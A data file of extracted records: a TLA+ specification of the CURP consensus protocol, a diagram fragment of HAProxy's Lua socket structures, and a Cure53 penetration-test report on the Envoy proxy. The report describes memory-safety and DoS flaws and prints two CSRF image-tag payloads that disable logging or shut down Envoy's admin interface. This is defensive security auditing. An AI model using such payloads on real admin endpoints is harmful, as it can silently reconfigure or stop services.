[ { "data": "module curp\nextends FiniteSets ,Naturals ,Sequences\nConstants:\ncommands :set of records like [key7→“key” ,value7→“value” ].\nreplicas :set of replicas .\nconstants commands ,replicas\nassume IsFiniteSet (replicas )\nVariables :\nleader :records the leader of each epoch .\nepoch :current epoch (the number of leader changes ).\nproposedCmds :the set of proposed commands .\nproposeRequests :the set of propose could be received by each replica .\nproposeResponses :the set of responses in each epoch to each proposed\ncommand .\nspecPools :the speculative pool of each replica .\nuncommittedCmds :the sequence of back −end protocol uncommitted commands .\ncommittedCmds :the sequence of back −end protocol committed commands .\ncommitMsgs :the set of commit messages could be received by each replica .\nspecExecPrevCmd :the index of the last same −key command in the committed\nsequence at the time the leader responds to the proposal .\nvariables leader ,epoch ,proposedCmds ,proposeRequests ,\nproposeResponses ,specPools ,uncommittedCmds ,\ncommittedCmds ,commitMsgs ,specExecPrevCmd\nThe epoch space .\nepoches∆=Nat\nSpecial noLeader value ,for future epoches .\nnoLeader∆=choose r:r/∈replicas\nIn N = 2∗f+ 1replicas :\nquorum :a set of replicas that contains at least f + 1replicas .\nsuperQuorum :a set of replicas that contains at least f + (f+ 1) /2 + 1\nreplicas .\nrecoverQuorum :a set of replicas that contains at least (f+ 1) /2 + 1\nreplicas .\nquorums∆=\nlet f∆=Cardinality (replicas )÷2\nsize∆=f+ 1\nin{q∈subset replicas :Cardinality (q)≥size}\nsuperQuorums∆=\nletf∆=Cardinality (replicas )÷2\nsize∆=f+ (f+ 1)÷2 + 1\n1in{q∈subset replicas :Cardinality (q)≥size}\nrecoverQuorums∆=\nletf∆=Cardinality (replicas )÷2\nsize∆= (f+ 1)÷2 + 1\nin{q∈subset replicas :Cardinality (q)≥size}\nHelper function for converting a set to a set containing all sequences\ncontaining the elements of the set exactly once and no other elements .\nSetToSeqs (set)∆=\nletlen∆= 1 . .Cardinality (set)in\n{f∈[len→set] :∀i,j∈len:i̸=j⇒f[i]̸=f[j]}\nHelper function for getting the index of the last element in a sequence\nsatisfying the predicate .\nGetIdxInSeq (seq,Pred())∆=\nletI∆={i∈1. .Len(seq) :Pred(seq[i])}in\nifI̸={}then choose i∈I:∀j∈I:j≤ielse 0\nPropose a command .\nThis is done by the client sending a proposeRequest to all replicas .\nPropose (cmd)∆=\n∧proposedCmds′=proposedCmds ∪ {cmd}\n∧proposeRequests′=\n[r∈replicas 7→proposeRequests [r]∪ {cmd}]\n∧unchanged ⟨leader ,epoch ,specPools ,proposeResponses ,\nuncommittedCmds ,committedCmds ,commitMsgs ,\nspecExecPrevCmd ⟩\nHow the leader process a proposeRequest .\nProcessProposeLeader (r,cmd)∆=\nletspecPoolHasConflict∆=\n∃specCmd ∈specPools [r] :specCmd .key=cmd .key\nuncommittedCmdsHasConflict∆=\nGetIdxInSeq (uncommittedCmds ,lambda e:e.key=cmd .key)̸= 0\nin\n∧proposeRequests′=\n[proposeRequests except ![r] = @\\{cmd}]\n∧specPools′=\n[specPools except ![r] =\nif¬specPoolHasConflict then @∪ {cmd}else @]\n∧uncommittedCmds′=Append (uncommittedCmds ,cmd)\n∧proposeResponses′=\n[proposeResponses except ![cmd][epoch ] =\nif¬specPoolHasConflict ∧ ¬uncommittedCmdsHasConflict\n2then @∪ {r}\nelse @]\n∧specExecPrevCmd′=\n[specExecPrevCmd except ![cmd] =\nif¬specPoolHasConflict ∧ ¬uncommittedCmdsHasConflict\nthen GetIdxInSeq (committedCmds ,lambda e:e.key=cmd .key)\nelse @]\n∧unchanged ⟨leader ,epoch ,proposedCmds ,committedCmds ,\ncommitMsgs ⟩\nHow a non −leader replica process a proposeRequest .\nProcessProposeNonLeader (r,cmd)∆=\nletspecPoolHasConflict∆=\n∃specCmd ∈specPools [r] :specCmd .key=cmd .key\nin\n∧proposeRequests′=\n[proposeRequests except ![r] = @\\{cmd}]\n∧specPools′=\n[specPools except ![r] =\nif¬specPoolHasConflict then @∪ {cmd}else @]\n∧proposeResponses′=\n[proposeResponses except ![cmd][epoch ] =\nif¬specPoolHasConflict then @∪ {r}else @]\n∧unchanged ⟨leader ,epoch ,proposedCmds ,uncommittedCmds ,\ncommittedCmds ,commitMsgs ,specExecPrevCmd ⟩\nSyncing a command using the back −end protocol (Raft).The implementation details\nare omitted .\nA replica may not be able to receive the commit message at the exact time the\nthe leader sends it .\nCommit∆=\n∧committedCmds′=Append (committedCmds ,Head (uncommittedCmds ))\n∧commitMsgs′=\n[r∈replicas 7→commitMsgs [r]∪ {Head (uncommittedCmds )}]\n∧uncommittedCmds′=Tail(uncommittedCmds )\n∧unchanged ⟨leader ,epoch ,specPools ,proposedCmds ,proposeRequests ,\nproposeResponses ,specExecPrevCmd ⟩\nHow a replica process a commit message .\nProcessCommitMsg (r,cmd)∆=\n∧commitMsgs′=\n[commitMsgs except ![r] = @\\{cmd}]\n∧specPools′= [specPools except ![r] = @\\{cmd}]\n∧unchanged ⟨leader ,epoch ,proposedCmds ,proposeRequests ,\nproposeResponses ,uncommittedCmds ,committedCmds ,\n3specExecPrevCmd ⟩\nLeader Change Action\nThe new leader should gather at least a quorum of replicas specPool to recover the commands.\nCommands existed in the specPool of aRecoverQuorum of replicas need to be recovered.\nLeaderChange (l)∆=\n∧leader′= [e∈epoches 7→ife=epoch + 1then lelse leader [e]]\n∧epoch′=epoch + 1\n∧ ∃q∈quorums :\nletspecCmds∆=union {specPools [r] :r∈q}\nnewSpecPool∆=\n{cmd∈specCmds :\n{r∈q:cmd∈specPools [r]} ∈recoverQuorums }\nin\n∧specPools′= [specPools except ![l] =newSpecPool ]\n∧uncommittedCmds′∈SetToSeqs (newSpecPool )\n∧unchanged ⟨proposedCmds ,proposeRequests ,proposeResponses ,\ncommittedCmds ,commitMsgs ,specExecPrevCmd ⟩\nThe initial state of the system.\nInit∆=\n∃r∈replicas :\nletinitEpoch∆= 1initLeader∆=rin\n∧leader = [e∈epoches 7→\nife=initEpoch then initLeader else noLeader ]\n∧epoch =initEpoch\n∧proposedCmds ={}\n∧proposeRequests = [replica ∈replicas 7→ {} ]\n∧proposeResponses =\n[cmd∈commands 7→[e∈epoches 7→ {} ]]\n∧specPools = [replica ∈replicas 7→ {} ]\n∧uncommittedCmds =⟨⟩\n∧committedCmds =⟨⟩\n∧commitMsgs = [replica ∈replicas 7→ {} ]\n∧specExecPrevCmd = [cmd∈commands 7→0]\nNext∆=\n∨ ∃cmd∈(commands \\proposedCmds ) :Propose (cmd)\n∨ ∃r∈replicas :∃cmd∈proposeRequests [r] :\nifleader [epoch ] =r\nthen ProcessProposeLeader (r,cmd)\nelse ProcessProposeNonLeader (r,cmd)\n∨uncommittedCmds ̸=⟨⟩ ∧Commit\n∨ ∃r∈replicas :∃cmd∈commitMsgs [r] :ProcessCommitMsg (r,cmd)\n∨ ∃l∈replicas :LeaderChange (l)\n4Spec∆=Init∧2[Next]⟨leader ,epoch ,specPools ,proposedCmds ,\nproposeRequests ,proposeResponses ,\nuncommittedCmds ,committedCmds ,commitMsgs ,\nspecExecPrevCmd ⟩\nType Invariants\nTypeOK∆=\n∧leader ∈[epoches →(replicas ∪ {noLeader })]\n∧epoch ∈epoches\n∧proposedCmds ⊆commands\n∧proposeRequests ∈[replicas →subset commands ]\n∧proposeResponses ∈[commands →[epoches →subset replicas ]]\n∧specPools ∈[replicas →subset commands ]\n∧uncommittedCmds ∈union {SetToSeqs (s) :s∈subset commands }\n∧committedCmds ∈union {SetToSeqs (s) :s∈subset commands }\n∧commitMsgs ∈[replicas →subset commands ]\n∧specExecPrevCmd ∈[commands →0. .Cardinality (commands )]\nStability Property\nThis is the key property of CURP :\n1. If a command is committed by CURP , command will eventually be synced by the back-end\nprotocol.\n2. If a command is committed by CURP , when the command is synced be the back-end protocol,\nthere will never be a command with the same key between the command and the recorded\nprevious same-key command in the synced sequence.\nStability∆=\n∀cmd∈commands :∀e∈epoches :\n(∧leader [e]∈proposeResponses [cmd][e]\n∧proposeResponses [cmd][e]∈superQuorums )⇒\nletidx∆=GetIdxInSeq (committedCmds ,lambda t:t=cmd)\nprevExecCmds∆=SubSeq (committedCmds ,1,idx)\nin\n∧idx̸= 0\n∧GetIdxInSeq (prevExecCmds ,lambda t:t.key=cmd .key) =\nspecExecPrevCmd [cmd]\ntheorem Spec⇒2TypeOK ∧3Stability\n5" } ]
{ "category": "Orchestration & Management", "file_name": "lua_socket.pdf", "project_name": "HAProxy", "subcategory": "Service Proxy" }
[ { "data": "lua_State *Tstruct hlua\nstop_list *stop\nstruct stream_interface si[0]\nenum obj_type *endstruct streamstack Lua\nstack entry 0\nstack entry 1\nstack entry 2\nstruct hlua_socket\nstack entry 3\nstack entry 4(list)struct session\nstruct task *task\nhlua_tcp_gc()\nCalled just before the object\ngarbaging(list)struct hlua_socket_com\nstruct task *task\nstruct appctx\nstruct <lua>\nstruct hlua_tcp *wrstruct hlua_tcp *rd\nhlua_tcp_release()\nCalled when the applet is destroyed.update_tcp_handler()\nCalled on each change on the \ntcp connection state.struct xref *xref\nstruct xref *xref" } ]
{ "category": "Orchestration & Management", "file_name": "audit_cure53_2018.pdf", "project_name": "Envoy", "subcategory": "Service Proxy" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report Envoy Proxy 02.2018\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, J. Larsson, Dipl.-Ing. A. Inführ,\nBSc. J. Hector, G. Kopf, M. Münch\nIndex\nIntroduction\nScope\nTest Coverage\nIdentified Vulnerabilities\nEP-01-001 HTTP: Lacking Admin-Interface Security allows CSRF and DOS (High)\nEP-01-002 HTTP: Potential BoF with HeaderStrings and Inline Buffers (Medium)\nEP-01-003 HTTP: Potential UaF with HeaderStrings and Ref. Buffers (Medium)\nEP-01-004 HTTP: Potential Integer Overflow during Header Encoding (Medium)\nMiscellaneous Issues\nEP-01-005 Common: strlcpy does not check for zero-sized Parameters (Low)\nEP-01-006 Redis: User-Controlled Allocation leads to DoS (Medium)\nEP-01-007 MongoDB: Stack Exhaustion via unbounded Recursion (Medium)\nEP-01-008 MongoDB: Lax Parsing when processing malformed Messages (Low)\nConclusion\nIntroduction\n“Originally built at Lyft, Envoy is a high performance C++ distributed proxy designed for\nsingle services and applications, as well as a communication bus and “universal data\nplane” designed for large microservice “service mesh” architectures.\nBuilt on the learnings of solutions such as NGINX, HAProxy, hardware load balancers,\nand cloud load balancers, Envoy runs alongside every application and abstracts the\nnetwork by providing common features in a platform-agnostic manner. When all service\ntraffic in an infrastructure flows via an Envoy mesh, it becomes easy to visualize\nproblem areas via consistent observability, tune overall performance, and add substrate\nfeatures in a single place.”\nFrom https://www.envoyproxy.io\nCure53, Berlin · 02/27/18 1/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nThis report documents the results of a penetration test and source code audit of the\nEnvoy proxy software. The project was carried out by Cure53 in February 2018 and\nyielded eight security-relevant findings.\nIn terms of resources, the testing team comprised six members of the Cure53 and two\ninvited experts from Secfault Security GmbH. This overall eight-member team was\ngranted a time budget of twenty days to complete the assessment, with a caveat that an\nadequate budget fraction should be preserved for the task of fix verifications and\ncommunications to happen post-assessment. Moving on to the approach, it has to be\nunderlined that all relevant sources of the Envoy compound are openly available on\nGithub. This naturally means that the security evaluation was rooted in a white-box\npremise since the envisioned attackers would have unlimited access to Envoy public\ndata. \nIt should be stated that the core scope items concerned exposition to rogue user-input,\nwith particular foci pointing to the HTTP parser, the header sanitizer and other\ncomponents of similar notoriety. What is more, the Envoy maintainers specifically\nrequested that the testers examine the TLS configuration, XFF and the generally\nslowloris-style DoS attacks. While all this was inspected by Cure53, the focus on DoS\nattacks also translated to looking at decompression of malicious HTTP content and\nnecessitated coverage with tests targeting the HTTP2 features. The Envoy Admin web\ninterface was placed under scrutiny of the testers as well, yet it was granted a much\nlower priority because it is not expected to become a viable target. Upon a later request\nfrom the maintainers, this component of the scope was actually ignored at sequent\nstages of the project.\nIn terms of the execution of this assessment, the project was split into two phases, with\nthe first centered on the source code audit and a search for code bugs, and the second\nencompassing a full-blown penetration test. The latter tried to attack an actually running\ninstance of Envoy and, quite clearly, investigated more complex attack scenarios, DoS\nattacks, spoofing and bypasses. Under this premise, there was a clearly defined\nattacker-model, specifically signifying a rogue and external attacker seeking to abuse\nbugs and vulnerabilities in the Envoy entities. The presumed goals of the adversaries\nwould be to escalate their findings and make the Envoy project either slow or completely\nshut down.\nAmong the already noted eight findings, there was an even mid-way split between four\nactual security vulnerabilities and four general weaknesses. It is vital to emphasize that\nno issues were marked as “Critical” in terms of security impact, severity or scope. This\nabsence of high-risk problems is a very good indicator for the broader state of security\nmatters at the Envoy compound.\nCure53, Berlin · 02/27/18 2/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIn the following paragraphs, this report will briefly focus on the technical outline of the\nscope and illuminates the overall coverage. It then moves on to the findings which are\ndiscussed on a case-by-case basis and presented together with mitigation advice. The\nclosing section allows for some general notes on the robustness of the Envoy project in\nlight of this Cure53 and Secfault Security GmbH’s joint assessment. \nScope\n•Envoy Proxy\n◦https://www.envoyproxy.io /\n◦Exact snapshot that was used for testing\n▪https://github.com/envoyproxy/envoy/tree/master\n▪Commit c31077b28e4f8a7db17895d5d2570e806e9e2a3e\nTest Coverage\nThis section comments on the test coverage reached by the testing team in the given\ntimeframe.\nTo start with the key item of the scope, the HTTP header manipulation was extensively\nexamined. The handling was investigated with a special focus on sanitization and\nperformed also with edge-case values. It was attempted to bypass header stripping,\ninject duplicate headers and break the HTTP transcoding by message splitting. The\nHTTP2 header compression aspect was covered in relation to the Denial-of-Service\nattack vectors.\nThe Admin Web Interface was checked for typical security problems. The findings in this\nrealm were concerning as the item was admittedly inadequate in terms of no\nAuthentication, lacking Header Security and the absence of the critical CSRF token.\nIn relation with the JSON parser, state machine was inspected for malformed input\nhandling and related memory management defects. An existing problem with incomplete\nJSON input was found but ultimately deemed unexploitable. A particular focus was\nplaced here on the intrinsic types like numbers and strings.\nNext on the list was the gRPC implementation which was checked for interface\ninterference issues. Also in this context there was a preselected item of top-priority,\nnotably concerning the potential threading model incompatibilities. Buffering and\ndecoding problems were considered in the HTTP and JSON filters, wherein an existing\ngeneral data starvation case was unveiled but discarded as insignificant.\nCure53, Berlin · 02/27/18 3/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe Lua implementation was investigated for common C interface misuse. The coroutine\nstate machine logic was verified. General integer overflows and null pointer\ndereferences could not be identified in this realm.\nFor the event handling code in the Ratelimit component, extra scrutiny did not yield any\nissues and found it adequate. Another aspect that generated no substantial findings was\nthe Redis protocol parser which was verified with special attention to logic issues like\ntreatment of invalid messages and illegal field lengths. Denial-of-service scenarios and\nout-of-bound situations could not be found in this realm. This positive evaluation\nextended to MongoDB parser code which was subjected to similar procedures as the\nRedis parser implementation and held strong.\nFurther, the Network component was considered for potential logic and DoS bugs but\nfound to be rather clean and strong against the non-standard problem areas. Here the\nexplication could be derived from the lack of the application logic’s implementation.\nFinally the SSL implementation was checked for typical TLS-related issues, configuration\nmalpractice and common certificate validation problems and the core Router request\nhandling was investigated for potential DoS scenarios. This last item was examined in\nregard to the brokerage code of the component.\nCure53, Berlin · 02/27/18 4/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in a chronological order rather than by\ntheir degree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. EP-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nEP-01-001 HTTP: Lacking Admin-Interface Security allows CSRF and DOS (High)\nIt was noticed quite early in the assessment that the Envoy’s Admin Interface, normally\nreachable under http://localhost:9901 , is highly insecure. This is because it completely\nfails to follow modern security standards. There is actual authentication (although per\ndefault the instance is only reachable locally), no HTTP security headers are in place\nand CSRF tokens are not deployed. The last point is especially dangerous because all\nadministrative operations can be carried out by simple GET requests. Therefore luring\nan internal administrator onto websites that embed the code like the following will signify\nchanges to the entire global configuration.\nExample HTML (disable logging):\n<img src=\"http://localhost:9901/ logging?admin=off \">\nExample HTML (shutdown the server) :\n<img src=\"http://localhost:9901/ quitquitquit\">\nBesides having a mass-impact in terms of modifications, the attacker may even turn off\nthe server. Both these high-impact action may occur without the administrator noticing\nfor certain. Although the Envoy team has expressed their awareness of the bad security\npremises of its Web Interface, it is still necessary to highlight the importance of relevant\nfixes. It is recommended to offer additional authentication, e.g. similar to the Apache’s\ndigest-auth mechanism. Furthermore, CSRF tokens should be urgently implemented, for\nexample by utilizing X-CSRF-TOKEN headers on each authenticated request.\nEP-01-002 HTTP: Potential BoF with HeaderStrings and Inline Buffers (Medium)\nWhile analyzing how Envoy implements HTTP headers inside their HeaderMap, it was\nnoticed that there were three possible implementations, depending on the use-case at\nhand. One of them concerned inline buffers that were mostly used for local variable type\ndeclarations where simple C-style char arrays were used for storage. This can be seen\nin the following definition of a buffer.\nCure53, Berlin · 02/27/18 5/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected File:\nenvoy/include/envoy/include/envoy/http/header_map.h\nAffected Code:\nunion {\n char inline_buffer_[128];\n uint32_t dynamic_capacity_;\n};\nAn actual problem was later discovered when checking how a header of this composition\nis being created in the respective constructor inside the HeaderString class. The\nfollowing code depicts said faulty implementation.\nAffected File:\nenvoy/include/envoy/source/common/http/header_map_impl.cc\nAffected Code:\nHeaderString::HeaderString(HeaderString&& move_value) {\n type_ = move_value.type_;\n string_length_ = move_value.string_length_;\n[...]\n case Type::Inline: {\n buffer_.dynamic_ = inline_buffer_;\n memcpy(inline_buffer_, move_value.inline_buffer_ , string_length_ + 1);\n move_value.string_length_ = 0;\n move_value.inline_buffer_[0] = 0;\n break;\n }\n }\n}\nOne can observe the later used string_length as being formed from the passed\nparameter and later used as a direct value for memcpy. This practically creates a call\nsuch as memcpy(dest, src, strlen(src)) . In this call the length of the source operand is left\nunchecked and can be bigger than the space reserved at destination. Since this function\ncan be an actual pitfall for potential buffer overflows, it is recommended to explicitly limit\nthe length of the source operand to the reserved room at the destination, namely 128\nbytes.\nCure53, Berlin · 02/27/18 6/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nEP-01-003 HTTP: Potential UaF with HeaderStrings and Ref. Buffers (Medium)\nWhile analyzing the HeaderMap implementation of Envoy, it was noticed that the code\nmakes use of the c_str() method for obtaining references to the underlying character\nbuffers of the STL strings. This pattern is not generally problematic but issues can arise\nwhen the string object is invalidated (e.g. deleted). In case of deletion or similar state, it\nhas to be ensured that the reference to the underlying memory buffer is also invalidated.\nOtherwise, the so-called use after free or similar vulnerability patterns can occur. One\nparticular example is shown below.\nAffected File:\nenvoy/include/envoy/source/common/http/header_map_impl.cc\nAffected Code:\nHeaderString::HeaderString(const std::string& ref_value) : \ntype_(Type::Reference) {\n buffer_.ref_ = ref_value.c_str();\n string_length_ = ref_value.size();\n}\nAfter calling the above copy constructor, ref_value could go out of scope or be deleted.\nIn such cases a reference to an invalid buffer would be stored in the HeaderString\nobject. It should be noted that this is only one example whilst saving the return value of\nthe c_str() method appears to be common throughout the analyzed code base. Using\nalternative approaches such as std::move should be evaluated in order to address this\nfinding in a more general manner.\nEP-01-004 HTTP: Potential Integer Overflow during Header Encoding (Medium)\nAnother potential buffer overflow resulting from an integer overflow has been spotted\ninside the HTTP/1 codec. This is due to the fact that two unsigned 32-bit integers were\nused inside an addition before being assigned to a 64-bit unsigned integer. The following\ncode shows the prototype of the reserveBuffer function which accepts a uint64_t as a\nsize parameter for the later allocation.\nAffected File:\nenvoy/source/common/http/http1/codec_impl.cc\nAffected Source:\nvoid ConnectionImpl::reserveBuffer( uint64_t size) {\n[...]\nHowever, the encodeHeader function uses two uint32_t types and adds them before\npassing them to reserveBuffer.\nCure53, Berlin · 02/27/18 7/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected Source:\nvoid StreamEncoderImpl::encodeHeader(const char* key, uint32_t key_size , const \nchar* value, uint32_t value_size ) {\n connection_.reserveBuffer( key_size + value_size + 4 );\n ASSERT(key_size > 0);\n connection_.copyToBuffer( key, key_size);\n[...]\nSince the addition is based on 32-bit integers, an addition of the values 0x7fffffff,\n0x7fffffff, and 4 (for instance) will lead to the value 2 being passed to reserveBuffer.\nThus, it will cause an allocation of a significantly smaller size. This was also checked\ninside the assembly where the addition is carried out and stored into the 32-bit large esi\nregister before being passed to reserveBuffer:\nAssembly snippet:\n 0x0000000000684049 <+25>: lea 0x4(%r13,%r12,1),%esi\n 0x000000000068404e <+30>: sub $0x18,%rsp\n 0x0000000000684052 <+34>: mov 0x38(%rdi),%rdi\n 0x0000000000684056 <+38>: mov %rcx,-0x38(%rbp)\n 0x000000000068405a <+42>: callq 0x683f80 \n<Envoy::Http::Http1::ConnectionImpl::reserveBuffer(unsigned long)>\nLater on, copyToBuffer is called with key_size of 0x7fffffff, despite there being room for\nonly 2 bytes. This would eventually be caught by the ASSERT statement inside\ncopyToBuffer where the remaining size is checked against the passed length, as\nillustrated below.\nAffected Source:\nvoid ConnectionImpl::copyToBuffer(const char* data, uint64_t length) {\n ASSERT(bufferRemainingSize() >= length);\n memcpy(reserved_current_, data, length);\n reserved_current_ += length;\n}\nHowever, since this is not explicitly declared as an RELEASE_ASSERT, there is no\nguarantee that this check will eventually land in the compiled version, thus opening the\ndoor for another potential overflow. It is recommended to catch the mentioned integer\noverflow, for example by relying on the built-in functionalities of GCC’1, specifically\n__builtin_uadd_overflow .\n1 https://gcc.gnu.org/onlinedocs/gcc/Integer-Overflow-Builtins.html\nCure53, Berlin · 02/27/18 8/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nEP-01-005 Common: strlcpy does not check for zero-sized Parameters (Low)\nAnother potentially flawed function was identified inside the Envoy’s utility library where\nall sorts of useful wrappers are defined. One of the items is a strlcpy implementation\nwhich is essentially just a wrapper around strncpy, used to make sure that the\ndestination is always null-terminated.\nAffected File:\nenvoy/source/common/common/utility.cc\nAffected Source:\nsize_t StringUtil::strlcpy(char* dst, const char* src, size_t size) {\n strncpy(dst, src, size - 1);\n dst[size - 1] = '\\0';\n return strlen(src);\n}\nThe dangers associated with wrappers like these one stems from the fact that the\nprogrammer always needs to make sure that the passed size is actually greater than\nzero. Otherwise the size - 1 will eventually wrap around to 0xffffffff and cause a copy\noperation that will continue to result in an overflow as long as no terminating null byte is\nfound in the source operand. A useful hardening addition here would be to make the\nwrapper itself check whether size is greater than 0. The proposed strategy will always\nprevent incorrect usage of the strlcpy function.\nEP-01-006 Redis: User-Controlled Allocation leads to DoS (Medium)\nDuring a cursory inspection of the Redis codec it was found that the implementation\nrelied on a user-supplied length arguments to perform memory allocations. Please\nconsider the code excerpt below to understand the corresponding flaw.\nAffected File:\nenvoy/source/common/redis/codec_impl.cc\nAffected Source:\n} else {\n std::vector<RespValue> values( pending_integer_.integer_ );\nCure53, Berlin · 02/27/18 9/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n current_value.value_->asArray().swap(values);\n pending_value_stack_.push_front({&current_value.value_->asArray()[0], 0});\n state_ = State::ValueStart;\n}\nIt can be observed that the code uses the previously parsed value of\npending_integer_.integer_ for allocating an array. Supplying an overly large array length\nmight hence provoke an out-of-memory condition, resulting in a DoS issue. It is generally\nrecommended to perform strict checks on all user-provided length arguments before\nusing them to perform allocations.\nEP-01-007 MongoDB: Stack Exhaustion via unbounded Recursion (Medium)\nA cursory inspection of the MongoDB implementation revealed that the BSON parsing\ncode allows for unbounded recursion depths when nested documents are being\nhandled. The following code excerpt can shed light on why this is a bad practice.\nAffected File:\nenvoy/source/common/mongo/bson_impl.cc\nAffected Source:\nvoid DocumentImpl::fromBuffer(Buffer::Instance& data) {\n[...]\ncase Field::Type::DOCUMENT: {\n ENVOY_LOG(trace, \"BSON document\");\n addDocument(key, DocumentImpl::create(data));\n break;\n}\nAffected File:\nenvoy/source/common/mongo/bson_impl.h\nAffected Source:\nstatic DocumentSharedPtr create(Buffer::Instance& data) {\n std::shared_ptr<DocumentImpl> new_doc{new DocumentImpl()};\n new_doc->fromBuffer(data);\n return new_doc;\n}\nIt can be observed that the code recursively calls the fromBuffer() method for building\nnew DocumentImpl instances. A deeply-nested BSON document might hence lead to a\nstack memory exhaustion, resulting in a DoS condition. It is recommended to generally\nrestrict the number of possible nesting levels to an appropriate value.\nCure53, Berlin · 02/27/18 10/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nEP-01-008 MongoDB: Lax Parsing when processing malformed Messages (Low)\nAnother issue found during a cursory inspection of the MongoDB implementation was\nlinked to the parsing of code, which was relatively permissive when it came to malformed\nmessages. A code excerpt supplied next can illustrate the issue at hand.\nAffected File:\nenvoy/source/common/mongo/bson_impl.cc\nAffected Source:\nvoid ReplyMessageImpl::fromBuffer( uint32_t, Buffer::Instance& data) {\n ENVOY_LOG(trace, \"decoding reply message\");\n flags_ = Bson::BufferHelper::removeInt32(data);\n cursor_id_ = Bson::BufferHelper::removeInt64(data);\n starting_from_ = Bson::BufferHelper::removeInt32(data);\n number_returned_ = Bson::BufferHelper::removeInt32(data);\n for (int32_t i = 0; i < number_returned_; i++) {\n documents_.emplace_back(Bson::DocumentImpl::create(data));\n }\n ENVOY_LOG(trace, \"{}\", toString(true));\n}\n[...]\nbool DecoderImpl::decode(Buffer::Instance& data) {\n[...]\n uint32_t message_length = Bson::BufferHelper::peakInt32(data);\n ENVOY_LOG(trace, \"message is {} bytes\", message_length);\n if (data.length() < message_length) {\n return false;\n }\n[...]\n switch (op_code) {\n case Message::OpCode::OP_REPLY: {\n std::unique_ptr<ReplyMessageImpl> message(new ReplyMessageImpl(request_id, \nresponse_to));\n message->fromBuffer( message_length, data);\n callbacks_.decodeReply(std::move(message));\n break;\n }\nIt can be observed that the code makes use of the decode() method in order to parse a\nMongoDB message from a buffer. In a first step, the message length field is extracted.\nAfter performing several other operations, the actual message is decoded using\nmessage->fromBuffer(message_length, data) .\nCure53, Berlin · 02/27/18 11/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nHowever, as the definition of ReplyMessageImpl::fromBuffer() shows, the previously\nextracted length field is not actually considered. The fromBuffer() method could hence\nconsume more bytes than the message’s length field actually indicates. Clearly, in order\nto provoke such a situation, a malformed message would have to be sent in the first\nplace. To sum up this flaw and mitigation, it might be advisable to add stricter checks\nregarding message sizes to the parsing code. A revised strategy would signify a\ndefense-in-depth approach.\nConclusion\nIn spite of eight security-relevant findings, the team responsible for this assessment of\nthe Envoy compound can attest to the overall good state of security matters at the tested\nproject. Tasking an eight-member testing team from Cure53 and Secfault Security GmbH\nentities has clearly demonstrated the robustness of the Envoy scope, while also enabled\nfor some minor flaws to be pointed out and - ideally - remediated. After spending twenty\ndays on the Envoy test target in February 2018, the penetration testers concluded that\nthe software was appropriately built and deployed. Similarly positive impression\nconcerned the Envoy code, which the auditors found to be well-written.\nTo comment on some specifics of this white-box assessment, it should be noted that the\nmaintainers requested a specific threat model to be covered. This encompassed a data-\nplane compromise and Denial-of-Service, which were addressed in depth by Cure53.\nBecause of this focus, the less concerning areas were subsequently treated with lower\npriority. From the test it quickly became apparent that the software boasted a modern\narchitecture and security was integrally interwoven into the deployment actions and\ndesign decisions taken by the project’s development team.\nFurther noticeable was the fact that the team run various code quality assurance tools\nand scanners to make sure that the software was not affected by the bugs and memory\ncorruptions commonly affecting similar projects, especially those surfacing during a\nshared timeframe. Another particularly positive aspect to mention was the careful\nselection and integration of high-quality and well-vetted external components. Despite\nthrough checks, not a single item bearing a noteworthy “Critical” risk was spotted.\nOn a less positive note, the above highly commendable attention to security did not\nextend to the web frontend for Admin users. This component was then taken out of\nscope. The decision was explained by the fact that having this item considered as part of\nthe attack surface does not hold in terms of the frontend carrying a minimal risk.\nFor the sake of completeness it should be noted that a full coverage of the entire\nspectrum of the software in scope was an impossible task. By acknowledging the sheer\nCure53, Berlin · 02/27/18 12/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nvolume, a considerable size and the myriad of implementation details on Envoy, it should\nbe clarified that the goal was to account for security on the focal areas and most\nsensitive, potentially risk-laden or threatened items. The actually reached level of\ncoverage was considered good, especially as the robustness of the audited code and\nimplementation of good practices appeared to have carried through different layers and\narenas. This can be read as an indicator of consistently good patterns and high-quality\nsecurity being present across the entire scope rather than a finding only applicable to the\nexplicitly prioritized scope.\nIn sum, the testers found the software to be quite mature and well-structured despite its\ninherent complexity. It can be expected that the discovery of the flaws will only increase\nthe overall good direction that the Envoy team is heading in from a security standpoint.\nCure53 would like to thank Harvey Tuch, 